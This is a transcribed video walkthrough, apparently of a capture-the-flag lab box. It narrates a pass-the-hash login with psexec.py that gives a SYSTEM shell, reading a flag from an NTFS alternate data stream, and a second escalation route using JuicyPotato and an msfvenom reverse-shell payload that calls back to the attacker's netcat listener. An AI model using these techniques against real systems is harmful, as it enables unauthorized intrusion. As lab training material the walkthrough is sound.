SMB. Obviously, when I did the box first, you can probably go and check out for all the passwords over here. So if in the backup stuff it says that password, and this is actually like an NTLM hash. So this is the NTLM hash, this is the LM hash, I guess, and this is the NT hash. What we can do is we can take this and try it use with PSExec to see if we get something. Okay, let's just try to close this. My bad. Over here, close it, and we can just do psexec.py. So this file is actually, if SMB is open, I guess, so it's going to create an SMB share, and you can actually pass the hash using this psexec, and you can gain access if it is a valid hash. Okay, so obviously you can try out for other hashes as well, but yeah, let's just look into this hash. There's no, as I mentioned earlier, I do not have tunnel vision that this is the actual thing. Obviously try out for other passwords over there and see if you get something. For the usage, you have to enter the domain. We do not have the domain, so let's just enter the host name of the box, and the username we can enter administrator, and password. Obviously if there was some other user which was interesting, we could enter that and check out for all the credentials present over here, or we can use this. So we'll use that and the password and that. Okay, so let's just do that first. So psexec, and also important thing is the hashes. You have to pass hashes over here which says LM hash and NT hash. So NTLM hashes can be sent over here. So we give psexec.py and give the name Jeeves, administrator at 10 63. Okay, and hashes, paste the hash. Let's see if this works. Okay, psexec, my bad, psexec. So it says requesting shares, found writable share, admin, uploading file. It's going to take some time probably. So we got something over here. We got a shell. If you do MI, obviously we are over here as system. So system and administrator are two different things. System is like only for Windows specific. You cannot log in into the system as system. You can log in as administrator, but you can, obviously I know now over here we got a shell because obviously there's this system process which we are in. Okay, so login as in entering username and password. Suppose administrator, I'm the administrator, I'm entering administrator password, and the administrator username, and the password is probably like I am the administrator. I cannot do the same with system because systems are used for like OS commands. They are a bit different. They are the same. They both have like almost full access to everything. If you get system or administrator, that's good enough as root in Linux, but they are a bit different. So just small thing, yeah, you can ignore that and you can go to cd and users, then go to administrator. What we can do is just maximize this, then go to desktop. If you do dir, we get something like txt and something over here. So let's just check out txt because there's no root text over here. So this is like the CTF version, which I was saying that this part is a bit like CTF, capture the flag kind of thing. But I'm not sure, it can be helpful. But yeah, so it says this flag is somewhere else, look deeper. So in short, what we can do is we can use the PowerShell command and see if there are any other files present inside these two files. Okay, so let's just see, and the command is get item path, and probably just enter this all stream, I think stream. Just see if this works. So this is another command which we can use to check if we have any files embedded, not embedded exactly, but behind as an alternate data stream. Okay, so in NTFS systems you can use alternate data streams to hide. Basically it's like just hiding a file behind this file. So if we see over here, the data of this file is this 36, and there's a root txt file which is of length 34 behind this particular hm.txt file, but you cannot see that. Even if you do dir/a, you cannot see it. You can see the desktop inf file which was probably hidden, but you cannot see that root txt file. For that you'll have to do dir/r for all the files. So probably we'll get that over here as well in alternate data stream. Okay, so this is where our root txt file is. Now the question is, how are you going to get this file? So probably you can just go and check for how to read ads file using PowerShell. Okay, you can check out over here, I guess. So we can use get item path, which we used earlier, right? So what this command does is basically you're using PowerShell command, right? Because this is actually CMD, it's not PowerShell, I guess, the one PSXX is using. So we need to execute PowerShell command. So give the C switch, enter the PowerShell command over here. So that is the get item, which is like present over here, and the path, which is this. So dot is like in the current working in this directory, and all the files are in this directory, as in this dot replicates this entire thing over here, and the slash obviously Windows, so backward slash, and asterisk means all the files. That's why it checked out for HM, as well as it checked out for Windows Update Assistant link as well, and stream. So stream is what we have to use over here, all, so that it will show all the data streams present behind this hm.txt file, since we gave this asterisk. So we have root txt over here. Now we need to read it, so we can use this get content path, the file. The example is the file name. Okay, so here they are not, we are given asterisk, right? We can give the file name, that is hm.txt, and stream, that is show me, is the stream which is present over here. So we have to replace that with root txt. So what we can do is we can run PowerShell again, C, and get content path, that is your hm.txt file, and also the stream, that is root txt. Okay, root txt, because here it is show me, right, the stream. So that's why we have to enter root.txt because over here the stream was root.txt. So if you hit enter, we get a hash over here. Okay, so this is what a hash looks like. I have obviously tried to overlap it, so but this is what it looks like, and this is the actual root flag, and this is like the CTF thing in the box, I guess. I'm not sure. It may be useful to get alternate data stream, to get some password or something in some box in future, like not the flag, but yeah. So that's how it is done, the first way. And to do the second way, obviously you can just probably exit from here, I guess. Okay, so we did exit, and what we can do is we can just try to get, what do you say, sorry. So what we'll try to do is we'll just go back to our shell, which is present over here, that is documents, kosuke, and if we go back, if we do cd who am I, then we are over here having, my bad, I just entered cd who am I, so who am I, and if you do all, we obviously have a SeImpersonatePrivilege thing over here. So what we can do is we can run juicy potato. So this is a script, and if you guys want, you can go on Google and check out for juicy potato. Check it out over here and get the download from this releases thing over here, juicy potato exe. So this is the file which I'm going to run, but I'm not going to transfer it to my target machine. I'm going to run it from SMB share because it would delete it. I guess there's an antivirus present over here, so it's going to delete it. So before that, I require to create a reverse shell, that is using MSF Venom. So we'll be using MSF Venom over here, and we'll be using the P switch for payload. Then Windows x64, because earlier we had seen it's a 64-bit system, and use shell reverse TCP, then give the hello host, that is the attack machine's IP address, that is 10.10.14.2028, and the L port, that is 5555, because 444 is in use, so you can give 555. And you can give the F switch for file type, that is exe, and you can give O switch for output. We can probably give reverse exe. Okay, so hit enter. It may take time to load. Let's just see how you have to run this juicy potato file. Okay, so in order to run it, you need to have this juicy potato exe to be executed. That is this, and then you can look. It looks a bit better over here, so you can check it out. So you have to execute this, and you have to give the L switch for the listening port, I guess. So I just leave it as default, and we can give the path to the file which you want to run. So this cmd.exe would not be cmd.exe because we do not have a GUI login, so we do not want our cmd to pop out, because that's not going to happen in the terminal. We'll give a file reverse exe. So we'll mention the SMB file part over here as reverse exe, give the T switch as all. I guess it means for some mode. Sorry, it means for this mode, I guess, over here. So you're gonna check for process with token, process as user as well, and yeah, and also the C switch, that is the class ID, I guess. So yeah, that's a class ID for every services, and if it does not work by default, if it is using something by default, if it does not work, so there's a list, I guess, which says class ID. You can check for your OS. So we had Windows 10 Pro, right? We can check for that. And we can use any of the class IDs which belong to like system users, okay, over here. So you can use that and try to run it. We have done in the previous box as well as seen in bust. So you can do that over there, and we have the MSF Venom payload ready. So if you do PWD and we do LSLA, so we have juicy potato, we have reverse exe present. So what we can do is we need to try to we need to create this particular payload over here, payload as in the script to execute. Okay, so in order to do that, what we'll just create a document and just command txt just to keep it simple. Now since we are in PowerShell, right, we want to execute this as cmd, this entire thing to execute command, because it's simpler to using cmd. So you can do that. You can do cmd, you can give the C switch over here, and then we can give the file name, that is the part over here, this SMB file. Okay, now don't get confused. I need to run juicy potato and reverse exe. I'm not going to transfer this file to the target machine. I'm going to leave it in the attack machine itself, and I'm going to run this file using the SMB which is running over here. I think I minimized it, but the SMB is running over here, right? SMB server, and the path is this SMB directory itself. So I'm going to run it as that. So what we'll try to do is we'll just start the cfdc. So this is the one way of executing cmd commands using PowerShell. So you can give, in order to execute that file, so we'll probably give 10.10.14.28 and just copy the file name so that we don't make any errors. So what I do, rename, and also we'll be giving the, yeah, so I think we need to give the else switch, that is 1334 as mentioned over here. Then we need to give p, that is a program to run, so that was p. My bad, juicy potato and mutated nuts would come over here because that's a file shared drive name. So we can copy this again over here in the process because we need to run that reverse exe file, right? So we'll do reverse exe, and we have to give the t switch. So let's just give t all. Also we can give the c switch over here, or we can leave it by default because it's not mandatory to give c switch as seen over here, I guess earlier. It's optional argument to give the c switch because if it does not work, by default it's going to use this. If it does not work, then probably you can check out that list over here and see. So this is what we are going to enter. That's it. We do not want to enter anything else. Copy this and probably we'll run it over here. Before that, let's just create netcat listener in cnvlp on port 555 because our reverse exe has port 555 which we created over here, right? 5555. Okay, so let's just run this whole command. Let's see if we are successful. If we do that, yes, I think we do get request for NSMB, but let's see if it works. We do get request at first, so obviously the first part did work. Let's see if the second part did work as well. It says created process with token. Okay, obviously it was running for some time and we got our shell over here. Again, if you do not get, if you just do who am I, we are obviously over here as system. If you do not get an error, it will probably show that it cannot create a token something. Then give the C switch, and which you can get it from here, and you can enter this entire thing, C switch, and this is how you enter the class ID. Okay, so this was the box. You can do it exploit in two ways, but yeah, so if you guys like the video, give a thumbs up and do subscribe for more upcoming videos. Thank you.